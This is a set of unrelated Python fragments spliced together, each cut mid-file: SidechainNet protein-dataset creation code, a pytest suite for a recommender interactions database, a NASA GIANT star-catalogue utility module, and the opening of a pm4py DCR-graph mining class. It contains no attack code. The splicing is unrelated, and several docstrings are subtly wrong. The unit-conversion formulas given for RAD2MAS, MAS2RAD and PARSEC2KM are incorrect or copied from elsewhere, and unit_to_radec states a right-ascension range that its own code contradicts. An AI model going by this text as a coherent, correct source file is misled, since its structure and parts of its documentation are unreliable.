training set thinnings. Defaults to 30.
sidechainnet_out (str, optional): Path for saving processed SidechainNet records.
Defaults to "data/sidechainnet/".
regenerate_scdata (bool, optional): If true, regenerate raw sidechain-applicable
data instead of searching for data that has already been preprocessed.
Defaults to False.
limit (bool, optional): The upper limit on number of proteins to process,
useful when debugging. Defaults to None.
Raises:
ValueError: when ProteinNet data paths are non-existant or not as expected.
"""
if casp_version == "debug":
raise ValueError("'debug' is not currently supported by scn.create.\n"
"Use scn.create(12, 'all') and a debug dataset will be created.")
# Download ProteinNet custom-helper package (concatenated ProteinNet datasets)
proteinnet_in = download_complete_proteinnet()
proteinnet_out = proteinnet_in
args = ArgsTuple(casp_version, thinning, proteinnet_in, proteinnet_out,
sidechainnet_out, regenerate_scdata, limit)
main(args)
def _create(args):
"""Generates SidechainNet for a single CASP thinning."""
# First, parse raw proteinnet files into Python dictionaries for convenience
pnids = get_proteinnet_ids(casp_version=args.casp_version,
split="all",
thinning=args.thinning)
pnids = pnids[:args.limit] # Limit the length of the list for debugging
# Using the ProteinNet IDs as a guide, download the relevant sidechain data
sc_only_data, sc_filename = download_sidechain_data(pnids, args.sidechainnet_out,
args.casp_version, args.thinning,
args.limit, args.proteinnet_in,
args.regenerate_scdata)
# Finally, unify the sidechain data with ProteinNet
sidechainnet_raw = combine_datasets(args.proteinnet_out, sc_only_data)
sidechainnet_outfile = os.path.join(
args.sidechainnet_out, format_sidechainnet_path(args.casp_version, args.thinning))
sidechainnet = organize_data(sidechainnet_raw, args.casp_version, args.thinning)
save_data(sidechainnet, sidechainnet_outfile)
print(f"SidechainNet for CASP {args.casp_version} written to {sidechainnet_outfile}.")
def _create_all(args):
"""Generate all thinnings of a particular CASP dataset, starting with the largest."""
# First, parse raw proteinnet files into Python dictionaries for convenience
pnids = get_proteinnet_ids(casp_version=args.casp_version, split="all", thinning=100)
pnids = pnids[:args.limit] # Limit the length of the list for debugging
# Using the ProteinNet IDs as a guide, download the relevant sidechain data
sc_only_data, sc_filename = download_sidechain_data(
pnids,
args.sidechainnet_out,
args.casp_version,
100,
args.limit,
args.proteinnet_in,
regenerate_scdata=args.regenerate_scdata)
# Finally, unify the sidechain data with ProteinNet
sidechainnet_raw_100 = combine_datasets(args.proteinnet_out, sc_only_data)
# Generate debug dataset with 200 training examples
sc_outfile = os.path.join(args.sidechainnet_out, format_sidechainnet_path("debug", 0))
debug = organize_data(sidechainnet_raw_100,
args.casp_version,
thinning=100,
is_debug=True)
save_data(debug, sc_outfile)
print(f"SidechainNet for CASP {args.casp_version} (debug) written to {sc_outfile}.")
# Generate the rest of the training sets
for thinning in [100, 95, 90, 70, 50, 30]:
sc_outfile = os.path.join(args.sidechainnet_out,
format_sidechainnet_path(args.casp_version, thinning))
sidechainnet = organize_data(sidechainnet_raw_100, args.casp_version, thinning)
save_data(sidechainnet, sc_outfile)
print(f"SidechainNet for CASP {args.casp_version} "
f"({thinning}% thinning) written to {sc_outfile}.")
def create_custom(pnids,
output_filename,
sidechainnet_out="./sidechainnet_data",
short_description="Custom SidechainNet dataset.",
regenerate_scdata=False):
"""Generate a custom SidechainNet dataset from user-specified ProteinNet IDs.
This function utilizes a concatedated version of ProteinNet generated by the author.
This dataset contains the 100% training set thinning from CASP 12, as well as the
concatenation of every testing and validation sets from CASPs 7-12. By collecting
this information into one directory (which this function downloads), the user can
specify any set of ProteinNet IDs that they would like to include, and this
function will be abel to access such data if it is available.
Args:
pnids (List): List of ProteinNet-formatted protein identifiers (i.e., formmated
according to <class>#<pdb_id>_<chain_number>_<chain_id>. ASTRAL identifiers
are also supported, <class>#<pdb_id>_<ASTRAL_id>.)
output_filename (str): Path to save custom dataset (a pickled Python
dictionary). ".pkl" extension is recommended.
sidechainnet_out (str, optional): Path to save processed SidechainNet data.
Defaults to "data/sidechainnet/".
short_description (str, optional): A short description provided by the user to
describe the dataset. Defaults to "Custom SidechainNet dataset.".
regenerate_scdata (bool, optional): If true, regenerate raw sidechain-applicable
data instead of searching for data that has already been preprocessed.
Defaults to False.
Returns:
dict: Saves and | |
<= 1').exists('rid >= 1') is True
def test_exists_6(db_interactions_with_mult_cols):
assert db_interactions_with_mult_cols.exists('timestamp >= 950.52') is True
def test_exists_7(db_interactions_with_mult_cols):
assert db_interactions_with_mult_cols.exists('timestamp >= 9500.52') is False
def test_exists_8(db_interactions_floats):
assert db_interactions_floats.exists('interaction == 5.0') is False
def test_exists_9(db_interactions_floats):
assert db_interactions_floats.exists('interaction == 5.5') is True
def test_exists_10(db_interactions_floats):
assert db_interactions_floats.exists('interaction == 3') is True
""" unique """
def test_unique_0(db_interactions):
assert check_list_equal(db_interactions.unique().values_list(), [
{'item': 'ps4', 'interaction': 3.0, 'rid': 0, 'user': 'jack'},
{'item': 'hard-drive', 'interaction': 4.0, 'rid': 1, 'user': 'john'},
{'item': 'pen', 'interaction': 1.0, 'rid': 2, 'user': 'alfred'},
{'item': 'xbox', 'interaction': 5.0, 'rid': 3, 'user': 'jack'}
])
def test_unique_1(db_interactions):
assert check_list_equal(db_interactions.unique('interaction').values_list(), [
{'interaction': 3.0, 'rid': 0},
{'interaction': 4.0, 'rid': 1},
{'interaction': 1.0, 'rid': 2},
{'interaction': 5.0, 'rid': 3}
])
def test_unique_2(db_interactions):
assert check_list_equal(db_interactions.unique(['interaction']).values_list(), [
{'interaction': 3.0, 'rid': 0},
{'interaction': 4.0, 'rid': 1},
{'interaction': 1.0, 'rid': 2},
{'interaction': 5.0, 'rid': 3}
])
def test_unique_3(db_interactions):
assert check_list_equal(db_interactions.unique(['user']).values_list(), [
{'user': 'jack', 'rid': 0},
{'user': 'john', 'rid': 1},
{'user': 'alfred', 'rid': 2}
])
def test_unique_4(db_interactions):
assert check_list_equal(db_interactions.unique(['user', 'interaction']).values_list(), [
{'interaction': 3.0, 'user': 'jack', 'rid': 0},
{'interaction': 4.0, 'user': 'john', 'rid': 1},
{'interaction': 1.0, 'user': 'alfred', 'rid': 2},
{'interaction': 5.0, 'user': 'jack', 'rid': 3}
])
def test_unique_5(db_interactions):
try:
db_interactions.unique((['user', 'test']))
assert False
except Exception as e:
assert str(e) == 'Unexpected column "test".'
def test_unique_6(db_interactions_with_mult_cols):
assert check_list_equal(db_interactions_with_mult_cols.unique(['tags']).values_list(), [
{'tags': 'tag1;tag2', 'rid': 0},
{'tags': 'tag5', 'rid': 1},
{'tags': '', 'rid': 2},
{'tags': 'tag3', 'rid': 3}
])
def test_unique_7(db_interactions_with_mult_cols):
assert check_list_equal(db_interactions_with_mult_cols.unique('session').values_list(), [
{'session': 5, 'rid': 0},
{'session': 3, 'rid': 1},
{'session': 2, 'rid': 2},
])
def test_unique_8(db_interactions_with_iids):
assert check_list_equal(db_interactions_with_iids.unique().values_list(), [
{'item': 'ps4', 'interaction': 3.0, 'rid': 0, 'user': 'jack', 'uid': 0, 'iid': 0},
{'item': 'hard-drive', 'interaction': 4.0, 'rid': 1, 'user': 'john', 'uid': 1, 'iid': 1},
{'item': 'pen', 'interaction': 1.0, 'rid': 2, 'user': 'alfred', 'uid': 2, 'iid': 2},
{'item': 'xbox', 'interaction': 5.0, 'rid': 3, 'user': 'jack', 'uid': 0, 'iid': 3}
])
def test_unique_9(db_interactions_floats):
assert check_list_equal(db_interactions_floats.unique('interaction').values_list(), [
{'interaction': 3.0, 'rid': 0},
{'interaction': 4.2, 'rid': 1},
{'interaction': 1.1, 'rid': 2},
{'interaction': 5.5, 'rid': 3}
])
def test_unique_10(db_interactions_int_ids):
assert check_list_equal(db_interactions_int_ids.unique('user').values_list(), [
{'user': 1, 'rid': 0},
{'user': 2, 'rid': 1},
{'user': 3, 'rid': 2},
])
def test_unique_11(db_interactions_int_ids):
assert check_list_equal(db_interactions_int_ids.unique('item').values_list(), [
{'item': 1, 'rid': 0},
{'item': 2, 'rid': 1},
{'item': 3, 'rid': 2},
{'item': 4, 'rid': 3},
])
""" count_unique """
def test_count_unique_0(db_interactions):
assert db_interactions.count_unique(['user']) == 3
def test_count_unique_1(db_interactions_with_mult_cols):
assert db_interactions_with_mult_cols.count_unique('session') == 3
def test_count_unique_2(db_interactions):
try:
db_interactions.count_unique((['user', 'test']))
assert False
except Exception as e:
assert str(e) == 'Unexpected column "test".'
def test_count_unique_3(db_interactions):
assert db_interactions.count_unique(['user', 'interaction']) == 4
""" max """
def test_max_0(db_interactions):
assert db_interactions.max('interaction') == 5.0
def test_max_1(db_interactions):
assert db_interactions.max('user') == 'john'
def test_max_2(db_interactions_with_mult_cols):
assert db_interactions_with_mult_cols.max('session') == 5
def test_max_3(db_interactions):
try:
db_interactions.max((['user']))
assert False
except Exception as e:
assert str(e) == 'Unexpected column type "<class \'list\'>".'
def test_max_4(db_interactions):
try:
db_interactions.max('users')
assert False
except Exception as e:
assert str(e) == 'Unexpected column "users".'
def test_max_5(db_interactions):
try:
db_interactions.max()
assert False
except Exception as e:
assert str(e) == 'No column was given.'
def test_max_6(db_interactions_with_iids):
assert db_interactions_with_iids.max('uid') == 2
def test_max_7(db_interactions_floats):
assert db_interactions_floats.max('interaction') == 5.5
def test_max_8(db_interactions):
assert db_interactions.max('rid') == 3
""" min """
def test_min_0(db_interactions):
assert db_interactions.min('interaction') == 1.0
def test_min_1(db_interactions):
assert db_interactions.min('user') == 'alfred'
def test_min_2(db_interactions_with_mult_cols):
assert db_interactions_with_mult_cols.min('session') == 2
def test_min_3(db_interactions):
try:
db_interactions.min((['user']))
assert False
except Exception as e:
assert str(e) == 'Unexpected column type "<class \'list\'>".'
def test_min_4(db_interactions):
try:
db_interactions.min('users')
assert False
except Exception as e:
assert str(e) == 'Unexpected column "users".'
def test_min_5(db_interactions):
try:
db_interactions.min()
assert False
except Exception as e:
assert str(e) == 'No column was given.'
def test_min_6(db_interactions_with_iids):
assert db_interactions_with_iids.min('uid') == 0
def test_min_7(db_interactions_floats):
assert db_interactions_floats.min('interaction') == 1.1
def test_min_8(db_interactions):
assert db_interactions.min('rid') == 0
""" select_user_interaction_vec """
def test_select_user_interaction_vec_0(db_interactions):
try:
db_interactions.select_user_interaction_vec(0).toarray().ravel()
assert False
except Exception as e:
assert str(e) == 'Cannot retrieve user interaction vector without assigned internal ids.'
def test_select_user_interaction_vec_1(db_interactions):
db_interactions = db_interactions.select('interaction > 2.5', copy=False)
db_interactions.assign_internal_ids()
assert np.array_equal(db_interactions.select_user_interaction_vec(0).toarray().ravel(), [3.0, 0, 5.0])
assert np.array_equal(db_interactions.select_user_interaction_vec(1).toarray().ravel(), [0, 4.0, 0])
def test_select_user_interaction_vec_2(db_interactions):
new = db_interactions.select('interaction > 2.5').select('interaction < 5')
new.assign_internal_ids()
assert np.array_equal(new.select_user_interaction_vec(0).toarray().ravel(), [3.0, 0])
assert np.array_equal(new.select_user_interaction_vec(1).toarray().ravel(), [0, 4.0])
try:
new.select_user_interaction_vec(2)
assert False
except Exception as e:
assert str(e) == 'User internal id 2 was not found.'
def test_select_user_interaction_vec_3(db_interactions_with_iids):
assert np.array_equal(db_interactions_with_iids.select_user_interaction_vec(0).toarray().ravel(), [3.0, 0, 0, 5.0])
def test_select_user_interaction_vec_4(db_interactions_with_iids):
assert np.array_equal(db_interactions_with_iids.select_user_interaction_vec(1).toarray().ravel(), [0, 4.0, 0, 0])
def test_select_user_interaction_vec_5(db_interactions_with_iids):
assert np.array_equal(db_interactions_with_iids.select_user_interaction_vec(2).toarray().ravel(), [0, 0, 1.0, 0])
def test_select_user_interaction_vec_6(db_interactions_with_iids):
try:
db_interactions_with_iids.select_user_interaction_vec(3)
assert False
except Exception as e:
assert str(e) == 'User internal id 3 was not found.'
def test_select_user_interaction_vec_7(db_interactions_floats):
db_interactions_floats.assign_internal_ids()
assert np.array_equal(db_interactions_floats.select_user_interaction_vec(0).toarray().ravel(), [3.0, 0, 0, 5.5])
def test_select_user_interaction_vec_8(db_interactions_floats):
db_interactions_floats.assign_internal_ids()
assert np.array_equal(db_interactions_floats.select_user_interaction_vec(1).toarray().ravel(), [0, 4.2, 0, 0])
def test_select_user_interaction_vec_9(db_interactions_floats):
db_interactions_floats.assign_internal_ids()
assert np.array_equal(db_interactions_floats.select_user_interaction_vec(2).toarray().ravel(), [0, 0, 1.1, 0])
""" select_item_interaction_vec """
def test_select_item_interaction_vec_0(db_interactions):
try:
db_interactions.select_item_interaction_vec(0).toarray().ravel()
assert False
except Exception as e:
assert str(e) == 'Cannot retrieve user interaction vector without assigned internal ids.'
def test_select_item_interaction_vec_1(db_interactions):
db_interactions = db_interactions.select('interaction > 2.5', copy=False)
db_interactions.assign_internal_ids()
assert np.array_equal(db_interactions.select_item_interaction_vec(0).toarray().ravel(), [3.0, 0])
assert np.array_equal(db_interactions.select_item_interaction_vec(1).toarray().ravel(), [0, 4.0])
def test_select_item_interaction_vec_2(db_interactions):
new = db_interactions.select('interaction > 2.5').select('interaction < 4')
new.assign_internal_ids()
assert np.array_equal(new.select_item_interaction_vec(0).toarray().ravel(), [3.0])
try:
new.select_item_interaction_vec(1)
assert False
except Exception as e:
assert str(e) == 'Item internal id 1 was not found.'
def test_select_item_interaction_vec_3(db_interactions_with_iids):
assert np.array_equal(db_interactions_with_iids.select_item_interaction_vec(0).toarray().ravel(), [3.0, 0, 0])
def test_select_item_interaction_vec_4(db_interactions_with_iids):
assert np.array_equal(db_interactions_with_iids.select_item_interaction_vec(1).toarray().ravel(), [0, 4.0, 0])
def test_select_item_interaction_vec_5(db_interactions_with_iids):
assert np.array_equal(db_interactions_with_iids.select_item_interaction_vec(2).toarray().ravel(), [0, 0, 1.0])
def test_select_item_interaction_vec_6(db_interactions_with_iids):
assert np.array_equal(db_interactions_with_iids.select_item_interaction_vec(3).toarray().ravel(), [5.0, 0, 0])
def test_select_item_interaction_vec_7(db_interactions_with_iids):
try:
db_interactions_with_iids.select_item_interaction_vec(4)
assert False
except Exception as e:
assert str(e) == 'Item internal id 4 was not found.'
def test_select_item_interaction_vec_8(db_interactions_floats):
db_interactions_floats.assign_internal_ids()
assert np.array_equal(db_interactions_floats.select_item_interaction_vec(0).toarray().ravel(), [3.0, 0, 0])
def test_select_item_interaction_vec_9(db_interactions_floats):
db_interactions_floats.assign_internal_ids()
assert np.array_equal(db_interactions_floats.select_item_interaction_vec(1).toarray().ravel(), [0, 4.2, 0])
def test_select_item_interaction_vec_10(db_interactions_floats):
db_interactions_floats.assign_internal_ids()
assert np.array_equal(db_interactions_floats.select_item_interaction_vec(2).toarray().ravel(), [0, 0, 1.1])
def test_select_item_interaction_vec_11(db_interactions_floats):
db_interactions_floats.assign_internal_ids()
assert np.array_equal(db_interactions_floats.select_item_interaction_vec(3).toarray().ravel(), [5.5, 0, 0])
""" user_to_uid """
def test_user_to_uid_0(db_interactions_with_iids):
assert db_interactions_with_iids.user_to_uid('jack') == 0
assert db_interactions_with_iids.user_to_uid('john') == 1
assert db_interactions_with_iids.user_to_uid('alfred') == 2
def test_user_to_uid_1(db_interactions_with_iids):
assert db_interactions_with_iids.user_to_uid('bla') is None
def test_user_to_uid_2(db_interactions_with_iids):
assert db_interactions_with_iids.select('user == "alfred"').user_to_uid('alfred') == 2
def test_user_to_uid_3(db_interactions_with_iids):
assert db_interactions_with_iids.select('user == "alfred"').user_to_uid('jack') == 0
def test_user_to_uid_4(db_interactions_with_iids):
assert db_interactions_with_iids.select('rid > 2').user_to_uid('jack') == 0
def test_user_to_uid_5(db_interactions):
try:
db_interactions.user_to_uid('jack')
assert False
except Exception as e:
assert str(e) == 'No internal ids assigned yet.'
def test_user_to_uid_6(db_interactions_int_ids):
db_interactions_int_ids.assign_internal_ids()
assert db_interactions_int_ids.user_to_uid(1) == 0
assert db_interactions_int_ids.user_to_uid(2) == 1
assert db_interactions_int_ids.user_to_uid(3) == 2
def test_user_to_uid_7(db_interactions_int_ids):
db_interactions_int_ids.assign_internal_ids()
try:
db_interactions_int_ids.user_to_uid('jack')
assert False
assert False
except Exception as e:
assert str(e) == "The provided user type does not match the inferred type (expected: int, found: <class 'str'>"
""" uid_to_user """
def test_uid_to_user_0(db_interactions_with_iids):
assert db_interactions_with_iids.uid_to_user(0) == 'jack'
assert db_interactions_with_iids.uid_to_user(1) == 'john'
assert db_interactions_with_iids.uid_to_user(2) == 'alfred'
def test_uid_to_user_1(db_interactions_with_iids):
assert db_interactions_with_iids.uid_to_user(3) is None
def test_uid_to_user_2(db_interactions_with_iids):
assert db_interactions_with_iids.select('user == "alfred"').uid_to_user(0) == 'jack'
def test_uid_to_user_3(db_interactions_with_iids):
assert db_interactions_with_iids.select('user == "alfred"').uid_to_user(1) == 'john'
def test_uid_to_user_4(db_interactions_with_iids):
assert db_interactions_with_iids.select('rid > 2').uid_to_user(1) == 'john'
def test_uid_to_user_5(db_interactions):
try:
db_interactions.uid_to_user(0)
assert False
except Exception as e:
assert str(e) == 'No internal ids assigned yet.'
def test_uid_to_user_6(db_interactions_int_ids):
db_interactions_int_ids.assign_internal_ids()
assert db_interactions_int_ids.uid_to_user(0) == 1
assert db_interactions_int_ids.uid_to_user(1) == 2
assert db_interactions_int_ids.uid_to_user(2) == 3
""" item_to_iid """
def test_item_to_iid_0(db_interactions_with_iids):
assert db_interactions_with_iids.item_to_iid('ps4') == 0
assert db_interactions_with_iids.item_to_iid('hard-drive') == 1
assert db_interactions_with_iids.item_to_iid('pen') == 2
assert db_interactions_with_iids.item_to_iid('xbox') == 3
def test_item_to_iid_1(db_interactions_with_iids):
assert db_interactions_with_iids.item_to_iid('bla') is None
def test_item_to_iid_2(db_interactions_with_iids):
assert db_interactions_with_iids.select('item == "hard-drive"').item_to_iid('hard-drive') == 1
def test_item_to_iid_3(db_interactions_with_iids):
assert db_interactions_with_iids.select('item == "hard-drive"').item_to_iid('pen') == 2
def test_item_to_iid_4(db_interactions_with_iids):
assert db_interactions_with_iids.select('rid > 2').item_to_iid('xbox') == 3
def test_item_to_iid_5(db_interactions):
try:
db_interactions.item_to_iid('ps4')
assert False
except Exception as e:
assert str(e) == 'No internal ids assigned yet.'
def test_item_to_iid_6(db_interactions_int_ids):
db_interactions_int_ids.assign_internal_ids()
assert db_interactions_int_ids.item_to_iid(1) == 0
assert db_interactions_int_ids.item_to_iid(2) == 1
assert db_interactions_int_ids.item_to_iid(3) == 2
assert db_interactions_int_ids.item_to_iid(4) == 3
def test_item_to_iid_7(db_interactions_int_ids):
db_interactions_int_ids.assign_internal_ids()
try:
db_interactions_int_ids.item_to_iid('ps4')
assert False
except Exception as e:
assert str(e) == "The provided item type does not match the inferred type (expected: int, found: <class 'str'>"
""" iid_to_item """
def test_iid_to_item_0(db_interactions_with_iids):
assert db_interactions_with_iids.iid_to_item(0) == 'ps4'
assert db_interactions_with_iids.iid_to_item(1) == 'hard-drive'
assert db_interactions_with_iids.iid_to_item(2) == 'pen'
assert db_interactions_with_iids.iid_to_item(3) == 'xbox'
def test_iid_to_item_1(db_interactions_with_iids):
assert db_interactions_with_iids.iid_to_item(4) is None
def test_iid_to_item_2(db_interactions_with_iids):
assert db_interactions_with_iids.select('iid == 0').iid_to_item(0) == 'ps4'
def test_iid_to_item_3(db_interactions_with_iids):
assert db_interactions_with_iids.select('iid == 0').iid_to_item(1) == 'hard-drive'
def test_iid_to_item_4(db_interactions_with_iids):
assert db_interactions_with_iids.select('rid > 1').iid_to_item(3) == 'xbox'
def test_iid_to_item_5(db_interactions):
try:
db_interactions.iid_to_item(0)
assert False
except Exception as e:
assert str(e) == 'No internal ids assigned yet.'
def test_iid_to_item_6(db_interactions_int_ids):
db_interactions_int_ids.assign_internal_ids()
assert db_interactions_int_ids.iid_to_item(0) == 1
assert db_interactions_int_ids.iid_to_item(1) == 2
assert db_interactions_int_ids.iid_to_item(2) == 3
assert db_interactions_int_ids.iid_to_item(3) == 4
""" drop """
def test_drop_0(db_interactions):
assert check_list_equal(db_interactions.drop([0, 2]).values_list(), [
{'item': 'hard-drive', 'interaction': 4.0, 'rid': 1, 'user': 'john'},
{'item': 'xbox', 'interaction': 5.0, 'rid': 3, 'user': 'jack'}
])
def test_drop_1(db_interactions):
assert db_interactions.drop([0, 2]).select('interaction > 4').values_list() == [
{'item': 'xbox', 'interaction': 5.0, 'rid': 3, 'user': 'jack'}
]
def test_drop_2(db_interactions):
assert db_interactions.select('interaction > 4').drop([0, 2]).values_list() == [
{'item': 'xbox', 'interaction': 5.0, 'rid': 3, 'user': 'jack'}
]
def test_drop_3(db_interactions):
assert db_interactions.select('interaction > 1', copy=False).select('interaction > 2', copy=False)\
.drop([0]).drop([3]).drop([0]).values_list() == [
{'item': 'hard-drive', 'interaction': 4.0, 'rid': 1, 'user': 'john'},
]
def test_drop_4(db_interactions_with_mult_cols):
assert db_interactions_with_mult_cols.select('interaction > 1', copy=False).select('interaction > 2', copy=False)\
.drop([0]).drop([3]).drop([0]).values_list() == [
{'item': 'hard-drive', 'interaction': 4.0, 'rid': 1, 'user': 'john', 'timestamp': 940.33, 'session': 3, 'tags': 'tag5'},
]
def test_drop_5(db_interactions):
assert check_list_equal(db_interactions.drop([0, | |
<gh_stars>1-10
# Copyright 2021 United States Government as represented by the Administrator of the National Aeronautics and Space
# Administration. No copyright is claimed in the United States under Title 17, U.S. Code. All Other Rights Reserved.
r"""
This submodule provides utility constants and functions for working with star data in GIANT.
Most of these utilities are focused on conversions of either units or of representations (ie a bearing to a unit
vector) with the exception of applying proper motion and computing the distance between 2 bearings. For more details on
what is contained refer to the following summary tables and the documentation for each constant/function.
"""
import datetime
from typing import Tuple, Union
import numpy as np
import pandas as pd
from giant._typing import SCALAR_OR_ARRAY, ARRAY_LIKE, Real
__all__ = ['DEG2RAD', 'RAD2DEG', 'DEG2MAS', 'MAS2DEG', 'RAD2MAS', 'MAS2RAD', 'PARSEC2KM', 'STAR_DIST',
'SI_DAYS_PER_YEAR', 'SI_SECONDS_PER_DAY', 'MJD_EPOCH', 'radec_to_unit', 'unit_to_radec',
'timedelta_to_si_years', 'datetime_to_mjd_years', 'apply_proper_motion', 'radec_distance']
"""
Things to import if someone wants to do from giant.catalogues.utilities import *
"""
# CONSTANTS.
DEG2RAD: float = np.pi / 180 # rad/deg
r"""
This constant converts from units of degrees to units of radians through multiplication.
That is ``angle_rad = angle_deg*DEG2RAD`` where ``angle_rad`` is the angle in radians and ``angle_deg`` is the angle in
degrees.
Mathematically this is :math:`\frac{\pi}{180}`.
"""
RAD2DEG: float = 180 / np.pi # deg/rad
r"""
This constant converts from units of radians to units of degrees through multiplication.
That is ``angle_deg = angle_rad*RAD2DEG`` where ``angle_rad`` is the angle in radians and ``angle_deg`` is the angle in
degrees.
Mathematically this is :math:`\frac{180}{\pi}`.
"""
DEG2MAS: float = 3600 * 1000 # mas/deg
r"""
This constant converts from units of degrees to units of milli-arc-seconds through multiplication.
That is ``angle_mas = angle_deg*DEG2MAS`` where ``angle_mas`` is the angle in milli-arc-seconds and ``angle_deg`` is the
angle in degrees.
Mathematically this is :math:`3600000`.
"""
MAS2DEG: float = 1 / DEG2MAS # deg/mas
r"""
This constant converts from units of milli-arc-seconds to units of degrees through multiplication.
That is ``angle_deg = angle_mas*MAS2DEG`` where ``angle_mas`` is the angle in milli-arc-seconds and ``angle_deg`` is the
angle in degrees.
Mathematically this is :math:`\frac{1}{3600000}`.
"""
RAD2MAS: float = RAD2DEG * DEG2MAS
r"""
This constant converts from units of radians to units of milli-arc-seconds through multiplication.
That is ``angle_mas = angle_rad*RAD2MAS`` where ``angle_mas`` is the angle in milli-arc-seconds and ``angle_rad`` is the
angle in radians.
Mathematically this is :math:`\frac{180}{3600000\pi}`.
"""
MAS2RAD: float = 1 / RAD2MAS
r"""
This constant converts from units of milli-arc-seconds to units of radians through multiplication.
That is ``angle_rad = angle_mas*MAS2RAD`` where ``angle_mas`` is the angle in milli-arc-seconds and ``angle_rad`` is the
angle in radians.
Mathematically this is :math:`\frac{3600000\pi}{180}`.
"""
PARSEC2KM: float = 30856775814913.673 # km
r"""
This constant converts from units of parsecs to units of kilometers through multiplication.
That is ``distance_km = distance_parsec*PARSEC2KM`` where ``distance_km`` is the distance in kilometers and
``distance_parsec`` is the distance in parsecs.
Mathematically this is :math:`\frac{3600000\pi}{180}`.
"""
STAR_DIST: float = 5.428047027e15 # km
"""
The average distance of stars from the UCAC4 catalogue in kilometers.
This value is used to set the distance for stars for which there is no distance information available.
"""
SI_DAYS_PER_YEAR: float = 365.25 # days
"""
This constant provides the number of SI days in a SI year.
"""
SI_SECONDS_PER_DAY: int = 86400 # seconds
"""
This constant provides the number of SI seconds in a SI day.
"""
MJD_EPOCH: datetime.datetime = datetime.datetime(1858, 11, 17) # November 17, 1858
"""
This constant provides the standard modified Julian date epoch, November 17, 1858, as a datetime
"""
# UTILITY FUNCTIONS
def radec_to_unit(ra: SCALAR_OR_ARRAY, dec: SCALAR_OR_ARRAY) -> np.ndarray:
r"""
This utility converts (a) right ascension and declination pair(s) expressed in units of radians into (an) unit
vector(s).
The conversion to a unit vector is given by:
.. math::
\hat{\mathbf{x}}=\left[\begin{array}{c}\text{cos}(\delta)\text{cos}(\alpha)\\
\text{cos}(\delta)\text{sin}(\alpha)\\
\text{sin}(\delta)\end{array}\right]
where :math:`\alpha` is the right ascension, :math:`\delta` is the declination, and :math:`\hat{\mathbf{x}}` is
the resulting unit vector.
This method is vectorized, therefore multiple unit vectors can be created from multiple ra, dec pairs at the
same time. When multiple conversions are performed, each unit vector is specified as a column in the array.
This function performs broadcast rules using numpy conventions, therefore you can provide inputs with different
shapes, so long as they are able to be broadcast (you could add them together and numpy wouldn't complain). If you
provide >1D arrays then they will be raveled using c convention.
:param ra: The right ascension(s) to convert to unit vector(s) in units of radians
:param dec: The declination(s) to convert to unit vector(s) in units of radians
:return: A 3xn array of unit vectors corresponding to the right ascension, declination pair(s)
"""
# make sure the arrays are the same length
ra, dec = np.broadcast_arrays(ra, dec)
ra = ra.ravel() # ensure our arrays are flat
dec = dec.ravel() # ensure our arrays are flat
unit_x = np.cos(dec) * np.cos(ra)
unit_y = np.cos(dec) * np.sin(ra)
unit_z = np.sin(dec)
return np.vstack([unit_x, unit_y, unit_z]).squeeze()
def unit_to_radec(unit: ARRAY_LIKE) -> Tuple[SCALAR_OR_ARRAY, SCALAR_OR_ARRAY]:
r"""
This function converts a unit vector(s) into a right ascension/declination bearing(s).
The right ascension is defined as the angle between the x axis and the projection of the unit vector onto the
xy-plane and is output between 0 and pi. The declination is defined as the angle between the xy-plane and the
unit vector and is output between -pi/2 and pi/2 (positive values indicate the vector has a positive z component and
negative values indicate the vector has a negative z component. These are computed using
.. math::
dec = \text{sin}^{-1}(z) \\
ra = \text{tan}^{-1}\left(\frac{y}{x}\right)
Note that the vector input should be along the first axis (or as columns if there are multiple vectors), and that
the vector(s) needs to be of unit length or the results from this function will be invalid.
If the input contains more than 1 vector, then the output will be 2 arrays. Otherwise, if it is a single vector,
the output will be 2 floats as a tuple.
:param unit: The unit vector to be converted to a ra/dec bearing
:return: The right ascension(s) and declination(s) as a tuple in units of radians
"""
if np.shape(unit)[0] != 3:
raise ValueError('The length of the first axis must be 3')
dec = np.arcsin(unit[2])
ra = np.arctan2(unit[1], unit[0])
ra_check = ra < 0
if np.ndim(ra):
ra[ra_check] += 2 * np.pi
elif ra_check:
ra += 2 * np.pi
return ra, dec
def timedelta_to_si_years(delta: datetime.timedelta) -> float:
"""
This function converts a python timedelta object to a fractional number of SI years.
The timedelta object is first converted to seconds using method ``total_seconds``, and this is then converted to SI
years.
:param delta: The python timedelta object to be converted to fractional SI years
:return: The length of time covered by the time delta in units of fractional SI years
"""
return delta.total_seconds() / SI_SECONDS_PER_DAY / SI_DAYS_PER_YEAR
def datetime_to_mjd_years(date: datetime) -> float:
"""
This function converts a python datetime objects to the number of SI years since the MJD Epoch of November 17, 1858.
This is computed by computing the time delta between the :attr:`.MJD_EPOCH` and the input datetime object, and then
using :func:`.timedelta_to_si_years` to convert to the fractional years since the epoch.
:param date: the python datetime object to be converted to MJD years
:return: the number of SI years since November 17, 1858
"""
return timedelta_to_si_years(date - MJD_EPOCH)
def apply_proper_motion(star_records: pd.DataFrame, new_time: Union[Real, datetime.datetime],
copy: bool = True) -> pd.DataFrame:
"""
This function adjusts the right ascension and declination of stars to a new time.
The right ascension and declination are updated using the corresponding proper motion of the stars. The formulation
used here assumes constant linear velocity as described in section 1.2.8 of "The Hipparcos and Tycho2 Catalogues".
The bearing measurement is converted to a unit vector, which is then updated using vector addition with the delta
applied along the vectors of increasing right ascension and increasing declination. This model also allows for
consideration of a radial velocity, but that is currently not implemented.
The stars input into this method should be a pandas dataframe with the GIANT format. Specifically, this function
requires the dataframe to have columns of ``['ra', 'dec', | |
from pm4py.objects.conversion.log import converter as log_converter
from pm4py.algo.filtering.log.attributes import attributes_filter
from copy import deepcopy
class Discover:
def __init__(self):
self.graph = {
'events': {},
'conditionsFor': {},
'milestonesFor': {},
'responseTo': {},
'includesTo': {},
'excludesTo': {},
'marking': {'executed': set(),
'included':set(),
'pending': set()
}
}
self.logAbstraction = {
'events': set(),
'traces': [[]],
'atMostOnce': set(),
'chainPrecedenceFor': {},
'precedenceFor': {},
'predecessor': {},
'responseTo': {},
'successor': {}
}
def mine(self, log, graph_path,findAdditionalConditions=True):
self.createLogAbstraction(log,graph_path)
self.mineFromAbstraction(findAdditionalConditions=findAdditionalConditions)
self.writeGraph(graph_path)
return 0
def createLogAbstraction(self, log, graph_path):
'''
Main mining
:param log: pm4py event log
:param graph_path: where to save the log
:return: 0 for success anything else for failure
'''
#event_log = log_converter.apply(log, variant=log_converter.Variants.TO_DATA_FRAME)
#event_log = event_log.sort_values(['case:concept:name','time:timestamp','concept:name'],ascending=True)
activities = attributes_filter.get_attribute_values(log, "concept:name")
events = set(activities)#event_log['concept:name'].unique())
